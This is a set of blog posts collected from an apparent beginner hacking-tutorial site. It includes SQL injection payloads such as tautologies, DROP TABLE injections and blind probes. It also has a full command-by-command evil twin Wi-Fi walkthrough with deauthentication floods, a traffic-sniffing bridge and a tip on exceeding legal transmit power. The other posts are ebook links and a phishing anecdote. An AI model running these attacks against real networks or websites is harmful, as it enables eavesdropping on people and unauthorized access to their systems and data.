SQL Injection Intermediate Level

This is a theoretical post about types of SQL Injection attacks and the concepts behind SQL Injection. I have added this here since so far we had been dealing with URLs, and will continue to do so. For the attacker, there is no direct way to write complete queries and he/she may only make changes to the URL or input form. However, the knowledge of MySQL (or any other DBMS) part of the attack is necessary, since it will be required when you deal with more robust websites where the standard attacks won't work and you need to get creative. Before reading this post, I recommend these 3:-

SQL Injection Basics (theoretical yet important)

Manual SQL Injection (using web browser only)

Automated SQL Injection using SQLMap (Kali Linux needed) 

Now we will proceed to the actual content of the post :-

Types of SQL Injection attacks

• Classic SQLI
• Blind or Inference SQL injection
• Database management system-specific SQLI
• Compounded SQLI

• SQL injection + insufficient authentication
• SQL injection + DDoS attacks
• SQL injection + DNS hijacking
• SQL injection + XSS

Technical implementations

Incorrectly filtered escape characters

This form of SQL injection occurs when user input is not filtered for escape characters and is then passed into a SQL statement. This results in the potential manipulation of the statements performed on the database by the end-user of the application.

The following line of code illustrates this vulnerability:

statement = "SELECT * FROM users WHERE name ='" + userName + "';"

This SQL code is designed to pull up the records of the specified username from its table of users. However, if the "userName" variable is crafted in a specific way by a malicious user, the SQL statement may do more than the code author intended. For example, setting the "userName" variable as:

' or '1'='1

or using comments to even block the rest of the query (there are three types of SQL comments). All three lines have a space at the end:

' or '1'='1' -- 
' or '1'='1' ({ 
' or '1'='1' /* 

renders one of the following SQL statements by the parent language:

SELECT * FROM users WHERE name = '' OR '1'='1';

SELECT * FROM users WHERE name = '' OR '1'='1' -- ';

If this code were to be used in an authentication procedure then this example could be used to force the selection of a valid username because the evaluation of '1'='1' is always true.

The following value of "userName" in the statement below would cause the deletion of the "users" table as well as the selection of all data from the "userinfo" table (in essence revealing the information of every user), using an API that allows multiple statements:

a';DROP TABLE users; SELECT * FROM userinfo WHERE 't' = 't

This input renders the final SQL statement as follows and specified:

SELECT * FROM users WHERE name = 'a';DROP TABLE users; SELECT * FROM userinfo WHERE 't' = 't';

While most SQL server implementations allow multiple statements to be executed with one call in this way, some SQL APIs such as PHP's mysql_query() function do not allow this for security reasons. This prevents attackers from injecting entirely separate queries, but doesn't stop them from modifying queries.

Incorrect type handling

This form of SQL injection occurs when a user-supplied field is not strongly typed or is not checked for type constraints. This could take place when a numeric field is to be used in a SQL statement, but the programmer makes no checks to validate that the user supplied input is numeric. For example:

statement := "SELECT * FROM userinfo WHERE id =" + a_variable + ";"

It is clear from this statement that the author intended a_variable to be a number correlating to the "id" field. However, if it is in fact a string then the end-user may manipulate the statement as they choose, thereby bypassing the need for escape characters. For example, setting a_variable to

1;DROP TABLE users

will drop (delete) the "users" table from the database, since the SQL becomes:

SELECT * FROM userinfo WHERE id=1;DROP TABLE users;

Blind SQL injection

Blind SQL Injection is used when a web application is vulnerable to an SQL injection but the results of the injection are not visible to the attacker. The page with the vulnerability may not be one that displays data but will display differently depending on the results of a logical statement injected into the legitimate SQL statement called for that page. This type of attack can become time-intensive because a new statement must be crafted for each bit recovered. There are several tools that can automate these attacks once the location of the vulnerability and the target information has been established.

Conditional responses

One type of blind SQL injection forces the database to evaluate a logical statement on an ordinary application screen. As an example, a book review website uses a query string to determine which book review to display. So the URL http://books.example.com/showReview.php?ID=5 would cause the server to run the query

SELECT * FROM bookreviews WHERE ID = 'Value(ID)';

from which it would populate the review page with data from the review with ID 5, stored in the table bookreviews. The query happens completely on the server; the user does not know the names of the database, table, or fields, nor does the user know the query string. The user only sees that the above URL returns a book review. A hacker can load the URLs http://books.example.com/showReview.php?ID=5 OR 1=1 and http://books.example.com/showReview.php?ID=5 AND 1=2, which may result in queries

SELECT * FROM bookreviews WHERE ID = '5' OR '1'='1';
SELECT * FROM bookreviews WHERE ID = '5' AND '1'='2';

respectively. If the original review loads with the "1=1" URL and a blank or error page is returned from the "1=2" URL, and the returned page has not been created to alert the user the input is invalid, or in other words, has been caught by an input test script, the site is likely vulnerable to a SQL injection attack as the query will likely have passed through successfully in both cases. The hacker may proceed with this query string designed to reveal the version number of MySQL running on the server:

http://books.example.com/showReview.php?ID=5 AND substring(@@version,1,1)=4

, which would show the book review on a server running MySQL 4 and a blank or error page otherwise. The hacker can continue to use code within query strings to glean more information from the server until another avenue of attack is discovered or his or her goals are achieved.

Second Order SQL Injection

Second order SQL injection occurs when submitted values contain malicious commands that are stored rather than executed immediately. In some cases, the application may correctly encode a SQL statement and store it as valid SQL. Then, another part of that application without controls to protect against SQL injection might execute that stored SQL statement. This attack requires more knowledge of how submitted values are later used. Automated web application security scanners would not easily detect this type of SQL injection and may need to be manually instructed where to check for evidence that it is being attempted.

This post is licensed under Creative Commons Attribution-ShareAlike 3.0. This license permits sharing, but requires attribution and that the content be shared under same or similar license . The source of the content in this page is -
https://en.wikipedia.org/wiki/SQL_injection
License details can be read here https://en.wikipedia.org/wiki/Wikipedia:Text_of_Creative_Commons_Attribution-ShareAlike_3.0_Unported_License

Blind SQLi Tutorial

You may read this tutorial if you have gone through the content of this page and are ready to go to the next level.

Read full post »

Kali Linux 1.1.0 Released

On 9th February 2105, Kali 1.1.0 was released. This is the latest version so far, and has a lot of major changes. Here's what the official Kali website had to say about it. Kali 1.1.0 can be download from here.-

After almost two years of public development (and another year behind the scenes), we are proud to announce our first point release of Kali Linux – version 1.1.0. This release brings with it a mix of unprecedented hardware support as well as rock solid stability. For us, this is a real milestone as this release epitomizes the benefits of our move from BackTrack to Kali Linux over two years ago. As we look at a now mature Kali, we see a versatile, flexible Linux distribution, rich with useful security and penetration testing related features, running on all sorts of weird and wonderful ARM hardware. But enough talk, here are the goods:

• The new release runs a 3.18 kernel, patched for wireless injection attacks.
• Our ISO build systems are now running off live-build 4.x.
• Improved wireless driver support, due to both kernel and firmware upgrades.
• NVIDIA Optimus hardware support.
• Updated virtualbox-tool, openvm-tools and vmware-tools packages and instructions.
• A whole bunch of fixes and updates from our bug-tracker changelog.
• And most importantly, we changed grub screens and wallpapers!

DownloadorUpgradeKaliLinux1.1.0

You can download the new version from our Kali Linux Download page, where you’ll also find mini-installer ISOS for both 32 and 64 bit CPU architectures. You can expect updated VMWare and multiple ARM image releases to be posted in the Offensive Security custom Kali Linux image download page in the next few days. As usual, if you’ve already got Kali Linux installed and running, there’s no need to re-download the image as you can simply update your existing operating system using simple aptcommands:

apt-get update
apt-get dist-upgrade

Read full post »

Tutorial on Hacking With Kali Linux

Hacking With Kali Linux

Why Kali Linux?

With Kali Linux, hacking becomes much easier since you have all the tools (more than 300 pre-installed tools) you are probably ever gonna need. Others can be downloaded easily. Now this tutorial will get you started and you'll be hacking with Kali Linux before you know it.

The problem with beginners

Now, I've been dealing with beginners since a long time. What they want is magic. A tool which is easy to use, works on Windows, can be download by searching on Google and clicking on the first link we see, and will do all the hacking itself on the push of a button. Sadly, no such tool exists. Hacking is an art, and it takes years of practice to master it. So how to get started? Having no idea about hacking is okay, but being a newbie with computers in general is not allowed. When I say beginner, I mean someone who has no experience with programming and with hacking methodologies. I didn't mean someone who needs a 1 page guide on how to download a tool. If you want to be a hacker, you have to work hard. So how to get started? If you have installed Kali Linux,  click here to skip past the installation paragraphs and go to hacking section of this post)

Getting Started

Now, I am not boring you with theory (^ As if all this wasn't enough theory). My aim is to get you to the point where you can start hacking with Kali Linux as soon as possible. What I'm gonna do is tell you what to do. The process is rather simple :-

• If you are totally clueless as to what Kali Linux is - Go to Kali's official website and get an idea.
• If you haven't already done that,go to their download page and download Kali Linux iso file.

Things get tough now

If you have no previous experience with Linux and virtual machines and all that stuff, getting Kali Linux up and running won't be a piece of cake.You have 2 options :

1. Read the Kali official documentation

That will give you an idea about what is a virtual machine, how OS can be run from USB, and how to create a partition and run 2 OS simultaneously. This is what I recommend. For that, go to Kali Official Documentation . 

2. Read my modified version of Kali documentation

The second option is to look at these posts, which are just sparingly modified versions of the Kali docs, and offer no advantage other than saving your time as their documentations cover much more than what the ones here do, and you don't really need to know all so much... yet. I'm linking them up here:

• Installing Kali Linux On Hard Disk using USB
• Dual Boot Kali (alongside Windows)
• Install Kali Linux in VmWare complete detailed guide

Command Line Interface

Some bash commands

Now, if you are really sure about becoming a hacker, you have to get used to linux, and specifically the command line interface. It is often compared to (and rightly so) to command prompt of Windows, but Linux' cli is much efficient and better than command prompt. What you have to do is do all the usual tasks you do in Windows in cli of Linux. Use cd to navigate, poweroff to shutdown, etc.

A pretty awesome site for that is - http://linuxcommand.org/

Going through the complete site is on its own enough exercise to keep you occupied for a month, but you can proceed gradually. The first few tutorials here will keep in mind that you don't have much info about cli, and will be really beginner friendly.

Some Useful Commands:

If you don't plan on learning all of linux cli commands, here are a few that will keep your boat afloat.

1. The default username and password is 'root' and 'toor'. 
2. Type 'poweroff' in the terminal to shutdown. 
3. apt-get command can be used to install tools and updates. 
4. apt-get update and apt-get upgrade will update all the programs installed on your machine. 
5. apt-get dist-upgrade will install the latest distribution of Kali(i.e. it upgrades your OS).

PS : Tapping <tab> while typing makes Kali complete the word for you . Double tapping <tab> makes it display all possible words starting with the incomplete word. Ctrl+c stops the functioning of any tool that is running. Pressing the up arrow key shows the command you last typed.

Some Real Hacking With Kali Linux

Assuming you've gone through the above steps and are comfortable with your new hacking environment, its time to do some real hacking with Kali Linux. My recommendation would be to start by hacking a wifi, then do some penetration testing, and maybe read something on Denial of Service when you have free time. Links here-

Hack wireless networks in Kali Linux using aircrack 

Penetration Testing In Kali For Beginners

Denial Of Service Attacks

Read full post »

Evil Twin Tutorial

Prerequisites

1. Kali Linux
2. Prior experience with wireless hacking

You will also need to install a tool (bridge utils) which doesn't come pre-installed in Kali. No big deal-

apt-get install bridge-utils

Objectives

The whole process can be broken down into the following steps-

1. Finding out about the access point (AP) you want to imitate, and then actually imitating it (i.e. creating another access point with the same SSID and everything). We'll use airmon-ng for finding necessary info about the network, and airbase-ng to create it's twin.
2. Forcing the client to disconnect from the real AP and connecting to yours. We'll use aireplay-ng to deauthenticate the client, and strong signal strength to make it connect to our network.
3. Making sure the client doesn't notice that he connected to a fake AP. That basically means that we have to provide internet access to our client after he has connected to the fake wireless network. For that we will need to have internet access ourselves, which can be routed to out client.
4. Have fun - monitor traffic from the client, maybe hack into his computer using metasploit. 

PS: The first 3 are primary objectives, the last one is optional and not a part of evil twin attack as such. It is rather a man in the middle attack. Picture credits : firewalls.com

Information Gathering - airmon-ng

To see available wireless interfaces-

iwconfig

To start monitor mode on the available wireless interface (say wlan0)-

airmon-ng start wlan0

To capture packets from the air on monitor mode interface (mon0)

 airodump-ng mon0

 After about 30-40 seconds, press ctrl+c and leave the terminal as is. Open a new terminal.

Creating the twin

Now we will use airbase-ng to create the twin network of one of the networks that showed up in the airodump-ng list. Remember, you need to have a client connected to the network (this client will be forced to disconnect from that network and connect to ours), so choose the network accordingly. Now after you have selected the network, take a note of it's ESSID and BSSID. Replace them in given code-

airbase-ng -a <BSSID here> --essid <ESSID here> -c <channel here> <interface name>

If you face any problems, a shorter code will be-

airbase-ng --essid <name of network> mon0 

Remove the angular brackets (< & >) and choose any channel that you want. Also, the BSSID can be randomly selected too, and doesn't have to match with the target. The interface would be mon0 (or whatever is the card you want to use) . The only thing identical about the twins has to be their ESSIDs (which is the name of the network). However, it is better to keep all parameters same to make it look more real. After you are done entering the parameters and running the command, you'll see that airbase turned your wireless adapter into an access point.
Note : We will need to provide internet access to our client at a later stage. Make sure you have a method of connecting to the net other than wireless internet, because your card will be busy acting like an AP, and won't be able to provide you with internet connectivity. So, either you need another card, or broadband/ADSL/3G/4G/2G internet.

Man in the middle attack : Pic Credits:  owasp.net

Telling the client to get lost

Now we have to ask the client to disconnect from that AP. Our twin won't work if the client is connected to the other network. We need to force it to disconnect from the real network and connect to the twin.

For this, the first part is to force it to disconnect. Aireplay will do that for us-

aireplay-ng --deauth 0 -a <BSSID> mon0 --ignore-negative-one

The 0 species the time internal at which to send the deauth request. 0 means extremely fast, 1 would mean send a packet every 1 seconds, 2 would mean a packet every 2 seconds, and so on. If you keep it as 0, then your client would be disconnected in a matter of seconds, so fire up the command, and press ctrl+c after a few seconds only. Note that the deauth is sent on broadcast, so all the clients (not just one) connected to the network will disconnect. Disconnecting a specific client is also possible.

Not the real one, but why the fake one

Even after being disconnected from the real AP, the client may choose to keep trying to connect to the same AP a few more times, instead of trying to connect to ours. We need to make our AP stand out, and for that, we need more signal strength. There are 2 ways to do that-

1. Physically move closer to the client.
2. Power up your wireless card to transmit at more power. 

The latter can be done with the following command -

iwconfig wlan0 txpower 27

Here 27 is the transmission power in dBm. Some cards can't transmit at high power, and some can transmit at extremely high power. Alfa cards usually support upto 30dBm, but many countries don't allow the card to transmit at such powers. Try changing 27 to 30 and you'll see what I mean. In Bolivia, however, you can transmit at 30dBm, and by changing the regulatory domain, we can overcome the power limitation.

iw reg set BO

iwconfig wlan0 txpower 30

It is strongly advised to not break laws as the transmission limits are there for a reason, and very high power can be harmful to health (I have no experimental evidence). Nevertheless, the client should connect to you if your signal strength is stronger than that you the real twin.

Note : If you are unable to get your client to connect to you, there is another option. You can leave him with no options. If you keep transmitting the deauth packets continuously (i.e. don't press ctrl+c after the client has disconnected), he will have no choice but to connect to you. However, this is quite an unstable situation, and the client will go back to the real twin as soon as it gets the chance.

Give the fake AP internet access

Now we need to provide internet access to the fake AP. This can be done in various ways. In this tutorial, we will consider that we have an interface x0 which has internet connectivity. Now, if you are connected to net via wireless, replace x0 with wlan1 or wlan0, a 3G modem will show up as ppp0. Nevertheless, you just have to know which interface is providing you with internet, and you can route the internet access to your client.

Interfaces

• x0 - This has internet access
• at0 - This is create by airbase-ng (wired face of the wireless access point). If you can somehow give internet access to at0, then the clients connected to your fake wireless network can connect to the net.
• evil - This is an interface that we will create, whose job will be to actually bridge the networks.

Creating evil

We will use Bridge control utility provided by Kali, brctl. Execute the following code-

brctl addbr evil

This will create the bridge. Now we have to specify which two interfaces have to be bridged-

brctl addif evil x0

brctl addif evil at0

We can assign an IP to the interfaces and bring them up using-

ifconfig x0 0.0.0.0 up 

ifconfig at0 0.0.0.0 up

 Also bring up the evil interface (the interfaces aren't always up by default so we have to do this many times)

ifconfig evil up

Now to auto configure all the complicated DHCP settings, we'll use dhclient

dhclient3 evil & 

Finally, all the configurations have been completed. You can execute ifconfig and see the results, which will show you all the interfaces you have created.
Officially, the evil twin attack is complete. The client is now connected to your fake network, and can use the internet pretty easily. He will not have any way to find out what went wrong. However, the last objective remains.

Have fun

Now that the client is using the internet via our evil interface, we can do some evil stuff. This actually comes under a Man In The Middle attack (MITM), and I'll write a detailed tutorial for it later. However, for the time being, I will give you some idea what you can do.

Sniffing using Wireshark

Now all the packets that go from the user to the internet pass through out evil interface, and these packets can be monitored via wireshark. I won't teach you how to use it here, since it is a GUI tool. You can take a look at their website to get an idea on how to use wireshark. Pic credits: The picture on the right has been directly taken from their website. 

http://www.wireshark.org/docs/wsug_html_chunked/ChapterIntroduction.html

Special Thanks

Matthew Bernard for his useful comment with some tips and a number of corrections http://www.kalitutorials.net/2014/07/evil-twin-tutorial.html?showComment=1406591245609#c5539483407421385761
The screenshots have also been taken by him and provided to me for usage (I would love to see more helpful visitors like him).

Read full post »

Sql Ebook: A Primer on SQL

Sql Beginners Ebook

Author's personal note

Welcome to the second edition of A Primer on SQL. The first edition was more popular than I had initially imagined. The overwhelming response and the many readers who wrote back with comments or a simple thanks, led me to putting efforts into making the second edition. There are many corrections and clarifications throughout the chapters, alongiwth two major changes. The introduction of using SQLite as an alternative DBMS in the text, and a new chapter on calculated fields. I hope that old and new readers find this text even more useful now in its presentation. I have tried to keep the spirit of the original text, a short introduction to the basics. As always, your questions, comments, criticism, encouragement and corrections are most welcome and you can e-mail me at rhlbatra[aht]hotmail[dot]com. Rahul Batra (24th February 2014) Preface to the first edition Welcome to the first edition of A Primer on SQL .
As you would be able to see,the book is fairly short and is intended as an introduction to the basics of SQL. No prior experience with SQL is necessary, but some knowledge of working with computers in general is required. My purpose of writing this was to provide a gentle tutorial on the syntax of SQL,so that the reader is able to recognize the parts of queries they encounter and even be able to write simple SQL statements and queries themselves.
Your questions, comments, criticism, encouragement and corrections are most welcome and you can e-mail me at rhlbatra[at]hotmail[dot]com. I’ll try answering all on-topic mails and will try to include suggestions, errors and omissions in future editions. Rahul Batra (8th October 2012)
PS: "Author's personal note" Author here means the author of the book not the one who wrote the blog post

About the author

Rahul Batra was first introduced to programming in 1996 in GWBASIC, but he did not seriously foray into it till 2001 when he started learning C++. Along the way, there were dabblings in many other languages like C, Ruby, Perl and Java. He has worked on Oracle, MySQL, Sybase ASA, Ingres and SQLite. Rahul has been programming professionally since 2006 and currently lives and works in Gurgaon, India.

Preview of the book

Download the book

You can download the book for free here -  https://leanpub.com/aprimeronsql

You can also choose to pay for the book which will help the author.

Read the book online

You can read the book online right here-

Read full post »

Reverse Engineering Ebook : Hacking the XBOX

About XBox Hacking

The Xbox video game console from Microsoft® is an exciting piece of hardware, and not just because it can play the latest video games. The powerful and cheap Xbox has the potential to be used as a PC, an all-in-one media player, or even a web server. Unfortunately, there is a dearth of books that can teach a reader how to explore and modify modern electronic hardware such as the Xbox. Most electronics textbooks are theory-oriented and very focused, whereas real hacking requires a broad set of practical skills and knowledge.
Also, the few practical books on hardware hacking that I had as inspiration as a child have long been outdated by the fast pace of technology. This book is intended to fill the need for a practical guide to understanding and reverse engineering modern computers: a handbook for a new generation of hackers. The ultimate benefit of hacking the Xbox is its educational value, or as the saying goes, “Given a fish, eat for a day; learn to fish, eat for a lifetime.” Hence, this book focuses on introducing basic hacking techniques — soldering, reverse engineering, debugging — to novice hackers, while providing hardware references and insight that may be useful to more seasoned hackers. The Xbox has served to educate both the security community and the hacking community: not because it is an outstanding example of security, but because it is a high profile, high volume product made by a large company whose focus was recently defined to be security by its chairman.1  The Xbox experience shows that building trustable clients in a hostile user environment is hard, even for a large, well-funded company. One observation is that this risk and difficulty of building cheap, trustable hardware clients places an upper bound on the impor- tance of the secret that can be trusted to such client hardware. In addition, the Xbox provides a consistent teaching example, with almost 10 million nearly identical units out there at the time of writing. The similarity of the Xbox’s architecture to a vanilla PC adds even more educational value to Xbox hacking, since much of the discussion in this book also applies directly to the much broader subject of PCs.

A little teaser to what the book contains
It is nearly 300 pages so it contains a lot
of stuff (on a variety of topics)

Another interesting aspect of Xbox hacking is the underground society of hardware hackers following the Xbox. The people who hacked the Xbox and the expertise they attained will be relevant long after the Xbox has become a dusty yard sale piece. Hence, there is a conscious social focus to this book. I have included profiles of a sampling of Xbox hacking personalities. The hope is to inspire people, through role models, to pick up a screwdriver and a soldering iron and to start hacking. Instilling this sort of exploratory spirit in the younger generations will be important in the long run for preserving the pool of talented engineers that drove the technology revolution to where it is today. Many of today’s engineers got their start hacking and tinkering with ham radios, telephones and computers which, back in that day, shipped with a complete set of schematics and source code. This pool of engineering talent is essential  for maintaining a healthy economy and for maintaining strong national security in the computer age.

Download the book

You can download the book from this website http://www.nostarch.com/xboxfree/ or use the direct link
 http://bunniefoo.com/nostarch/HackingTheXbox_Free.pdf

Read the book online

You can read the book right here. Take a look at a few pages and see if you like the book and want to download and read it all.

Read full post »

Hacking Secret Ciphers With Python

About the ebook

There are many books that teach beginners how to write secret messages using ciphers. There are a couple books that teach beginners how to hack ciphers. As far as I can tell, there are no books to teach beginners how to write programs to hack ciphers. This book fills that gap.
This book is for complete beginners who do not know anything about encryption, hacking, or cryptography. The ciphers in this book (except for the RSA cipher in the last chapter) are all centuries old (helps develop basic concepts), and modern computers now have the computational power to hack their encrypted messages.



 No modern organization or individuals use these ciphers anymore. As such, there’s no reasonable context in which you could get into legal trouble for the information in this book.
This book is for complete beginners who have never programmed before. This book teaches basic programming concepts with the Python programming language. Python is the best language for beginners to learn programming: it is simple and readable yet also a powerful programming language used by professional software developers. The Python software can be downloaded for free from http://python.org and runs on Linux, Windows, OS X, and the Raspberry Pi.
There are two definitions of “hacker”. A hacker is a person who studies a system (such as the rules of a cipher or a piece of software) to understand it so well that they are not limited by the original rules of that system and can creatively modify it to work in new ways. “Hacker” is also used to mean criminals who break into computer systems, violate people’s privacy, and cause damage. This book uses “hacker” in the first sense. Hackers are cool. Criminals are just people who think they’re being clever by breaking stuff. Personally, my day job as a software developer pays me way more for less work than writing a virus or doing an Internet scam would.
On a side note, don’t use any of the encryption programs in this book for your actual files. They’re fun to play with but they don’t provide true security. And in general, you shouldn’t trust the ciphers that you yourself make. As legendary cryptographer Bruce Schneier put it, “Anyone, from the most clueless amateur to the best cryptographer, can create an algorithm that he himself can’t break. It’s not even hard. What is hard is creating an algorithm that no one else can break, even after years of analysis. And the only way to prove that is to subject the algorithm to years of analysis by the best cryptographers around.”
This book is released under a Creative Commons license and is free to copy and distribute (as long as you don’t charge money for it). The book can be downloaded for free from its website at http://inventwithpython.com/hacking. If you ever have questions about how these programs work, feel free to email me at al@inventwithpython.com.

Read full post »

Anonymous Security Handbook

About the ebook

This is a security handbook by Anonymous (internet activists or hacktivists) to help it's members stay anonymous. While it has no direct utility for you in the context of anonymous, it has a lot of useful information which which help you protect your privacy on the internet and stay safe as a hacker. You can find more about anonymous here.

Anonymous – The Über-Secret Handbook

Note: While I didn't find anything in the ebook which said it was licensed under creative commons, I assumed that it isn't copyrighted and I am free to propagate this material via my blog.

Read full post »

Encryption - Crypters ebook

The crypter Handbook

This ebook can be read directly via your browser.

If you have difficulty reading the book, go to this page to get a full screen view or download the ebook for offline reading.   https://docs.google.com/file/d/0B5UZaaEGmAw7SkEydGE1UTlPTUk/

See the last few pages of the book for licensing and bibliography. (info about original author and his website)

Read full post »

Real Life Phishing Scenario : Zero Day google bug

A reader on my blog tried to hack my account

Now all this time I've been teaching people how to hack Wireless networks, Windows machines, Websites and Social Networking accounts. All this we did in Kali Linux. For once, I'm moving away from the operating system and narrating a real life incidence of how someone almost got my Email account and password, and could have possibly infected me with a RAT (remote administration tool). He didn't really mean to hack my account, but was rather interested in making a point. So this is how it happened.

How it started

Everyday, I check my blogger dashboard to see if there are any new comments on my blog. Today morning, I saw an anonymous comment (most of the comments are anonymous so that didn't alarm me) saying that the person needed my help with something but would only contact me via mail. I couldn't give him my personal mail address so I decided to use my website's mail instead, and sent him a message. This was his reply

Looked fair enough. Out of curiosity I clicked the link and it took me to a google drive login page. Everything looked pretty convincing, and I could have easily entered my credentials into the login form, if it were not for the slightly suspicious URL. Also, it was https and chrome verified the digital certificates to be that of google. Faking this can be assumed to be next to be impossible. However, I still was cautious, considering that I run a hacking blog and it's not unlikely that a person visiting here might be good, maybe million times better than me.

What I did

So, I decided, I cannot just dismiss the page as phishing as such without trying. So I entered the email:abcd@gmail.com and password:lookslikephishing and pressed sign in. Now if it were a real page, it would have said incorrect password, but this page had no mechanism for verifying the form data, it actually just kept logging everything (i.e. it recorded whatever someone entered in the form) and would simply download the PDF no matter what we entered in the form. So, after entering the bogus login data, the PDF download started. It completed successfully and I ran the PDF. The content looked genuine and then I realized, well, what if this was a 2 fold attack, first phishing, followed by infection. He could have used a FUD remote administration tool which my antivirus wouldn't be able to detect. I have Windows Defender on my Windows 8 machine, but with proper crypting , anti-viruses can be evaded. So after this, I went to white hat section of hackforums and asked for help (everyone needs help at some time or the other, and I suck at forensics and related stuff) . An expert analyzed my computer thoroughly via teamviewer, and the file was clean indeed. Meanwhile, the following mails had been sent to me.

Mails Recieved

He sent me some mails

He knew I found out the phishing page thing

He said he wants me to spread public awareness regarding this kind of phishing

I replied to him saying that I'm finding out and cleaning the malware he sent me (if any). He replied and said he didn't send any malware or anything.

Finally

 I contacted him via FB. He turned out to be a fellow Indian and was even younger than me (I'm 17 he is 16). By this time I had finished my investigation, and the White hat expert from Hackforums didn't find anything either. I finally concluded that either there is no malware, or he's just too good. Latter is quite unlikely since he was not able to dig up my personal email address on his own. Believe me that's really easy to do. After having a conversation with him and doing some research on this HTTPS phishing page, I realized that it is done using a bug in Google drive, which has been discussed on The Hacker News. I will see if I can replicate a HTTPS phishing website using this bug, and post a tutorial on how to do it. The sole intent of this post is to make people aware that Phishing is a real threat, and to encourage Google to fix this bug soon. Either ways, they will surely patch this bug after I write the tutorial on creating a Phishing page using Google Drive, as Google won't want it's user's accounts to be compromised by any random kid with  a laptop who ended up on this website. Already they have applied a patch which makes carrying this out difficult and during the earlier days of this vulnerability, the URL was short and not suspicious at all, but now it's very long (see the screenshots). Update : Google is probably not going to do anything about the issue as it is not a bug and I'm not gonna take the risk of writing anything which will usher upon me the wrath of Google (as I use blogger for hosting and blogger is owned by google). Google Drive, just like Dropbox allows hosting simple HTML sites like this phishing one. This can be abused, since some people will not know that this is a malicious document uploaded by someone and not a legit Google Drive login page, but it still is not a bug. 

Hacker's message on FB

After I told the hacker on Facebook about this post even he acknowledged that everything about this attack is perfect but the URL which earlier used to start with google drive now has a long suspicious prefix. The vulnerability has been half patched and google will possibly patch the remaining thing soon.

Read full post »

So You Want To Be A Hacker

Ah! The world of hackers. It has changed much from the fabled green black terminal operated by guys with spectacles on their eyes and a serious look on their face. Now even a script kiddie who types a few lines on a Kali Linux calls himself a hacker. The terminal is still there, but the colors have changed. It's black terminal with text of all colors. But who cares about the colors. It's the new Operating Systems : The likes of Kali Linux,

Backtrack, BackBox Linux, Node Zero, Blackbuntu, and many more, which have made hacking much easier. However, has it got easy enough? No. Not at all.

It's getting harder

When the going gets tough, the tough get going

While Kali Linux can make hacking Windows XP, wirless networks, and some weak websites very easy, it doesn't mean it is a magical solution to all problems. Everything that can be hacked easily is ancient. No one uses Windows XP anymore, and if they do, the machines are patched because of automatic updates. Very few websites are vulnerable to the standard SQL injection attacks. You'll have to think up and use variants of standard injections to counter the defenses. Yes, WEP networks are easy to hack, and are still abundant, especially in developing countries. But if you want to hack Facebook, then you should step back already, you're going the wrong direction. Facebook isn't paying millions for security so that a kid can Google up the procedure to hack FB and be done with it overnight. But wait, how could I even imagine that you've already reached this point. While all this hacking XP and WEP shit is pretty easy, is it okay to assume you can do it, and are worried about the 'harder' part. Or wait, are you experiencing difficulty in even using Kali Linux. Can't figure out how to install it. Well...

Oh well

First time is always the hardest

In the previous few paragraphs I made a big mistake. I assumed that you have installed Kali Linux and can do some basic stuff with it, and the intermediate level tasks are bothering you. I almost forgot how it was for me. Well let me tell you.

1. I was 12. Wanted to hack this wireless network next door. 
2. Download some shitty Windows software. Won't work. Plus had malware installed which had to be removed with antivirus.
3. More googling, came across BT4. Googled up some tutorials on how to install it. Was too stupid for Vmware. Live? No. Couldn't create a bootable USB. I downloaded the OS and simply copied it to the USB and thought it'll boot. Googled more. Some result said something about boot order. Okay, make USB boot before hard disk. Made some sense, but it wouldn't work. As it is, I was scared as hell when modifying stuff in the scary looking BIOS interface. Hoping I don't do any damage.
4. Some time later, BT5 was released. Me? A bit smarter this time. Could get BT5 to boot. Read some WEP hacking tutorials. Wasn't able to follow. I even had a tough time with getting the GUI to start. In BT5 we had to type startx for starting X Display server. Didn't know that. Finally, hacked wifi using Aircrack-ng GTK or something (don't remember the name exactly, but it was GUI mode of aircrack, and it was pretty easy for a beginner like me to use it).
5. Took me an year before I knew how to do stuff without GUI. An year sounds like a long time, but remember, I have much more stuff to do than just hack. I used BT5 once every few months, only when a new network would show up in the neighbourhood, and I would hack it with my laptop. 
   
6. Had a great sense of accomplishment inside me. Felt like I was king of this territory, and owned every wireless network here. But then, a WPA-2 network appeared. I tried everything I could, but gave up. I read on hackforums a tutorial on using WPS vulnerability to hack WPA. Well, it looked like it was written in an alien language. Honestly, after knowing how easy hacking WPS enable WPA networks is, I seriously think that the first time indeed is the hardest. 
7. Fast forward to this moment. I have mastered the basics of linux command line interface, but still have a lot to learn. I can write bash scripts to automate stuff, and can use most of the tools with ease. I am currently studying exploit development and research and can write simple exploits. There's a lot left to learn. I know the depths of wireless pentesting, but only intermediate level of web pentesting. I know the basics of social engineering, but again, lot of things to learn. Now if you are concluding I'm an idiot on the basis of the fact that in every field I just know the basics, well then you need to realize that the meaning of basics in my perspective is much different from that in yours. I need to know a lot of stuff, but I know a lot too.

So what do you conclude from this? Well if you are not able to install Kali, or follow any other tutorial in my website, then don't be surprised. If everyone who visits this website became a hacker, then we'd be having more than 100k hackers created from this website alone, which isn't a good thing at all, considering there are many other websites which receive much more traffic than mine. 

Why so difficult

Hacking is an art

Because that's the way it is. Hacking is an art, and like any other, it takes practice, hard work and determination to master this art. For example, after watching dynamo on TV, I got lured into the idea of becoming a magician. Well, I tried some tricks, but failed miserably. Realized it was not my piece of cake. Some of the tricks require years of practice before they can be pulled off successfully. Not everyone who decides to be a magician ends up becoming one. There are obstacles in the way, disappointments, milestones too hard too achieve. The ones who stay determined all the way to the end only achieve this. It's not everyone's piece of cake. Same goes with hacking. What makes hackers exclusive and special is the fact that not everyone is a hacker. I am known in my class (whole school as well) for being a hacker. Why? Because I'm the only one. Not everyone who sets out to be a hacker becomes one. But there's more to the story than this.

Not that difficult

You are lucky that you ended up on this blog (not a quote as such)

Well, the sites I used to learn hacking were crap. The WEP tutorial was just 3-4 lines of code and no
explanation. I won't be wrong if I say that, while I read a lot of tutorials, none was good enough. For every line in a tutorial, I had to google up another tutorial which explained what it meant. That is, I worked hard and figured everything out on my own. You, however, are lucky. The posts in this blog have been written such that everything is properly explained. In the later tutorials I have been a bit lazy, but it won't be a problem if you follow the tutorials in correct sequence. If you have read 2-3 tutorials on pentesting, you would already know the basics, and the 4th one wouldn't have to be very detailed. If you jump to Win 7 hacking without going through XP, then you'll encounter difficulties. Now I have created a page on this blog where I have ordered the posts in the desirable order of reading. You might also look at the navigation menu on top and read all the tutorials on a top to bottom order basis. And here's the truth finally.

The truth

I want to hack facebook

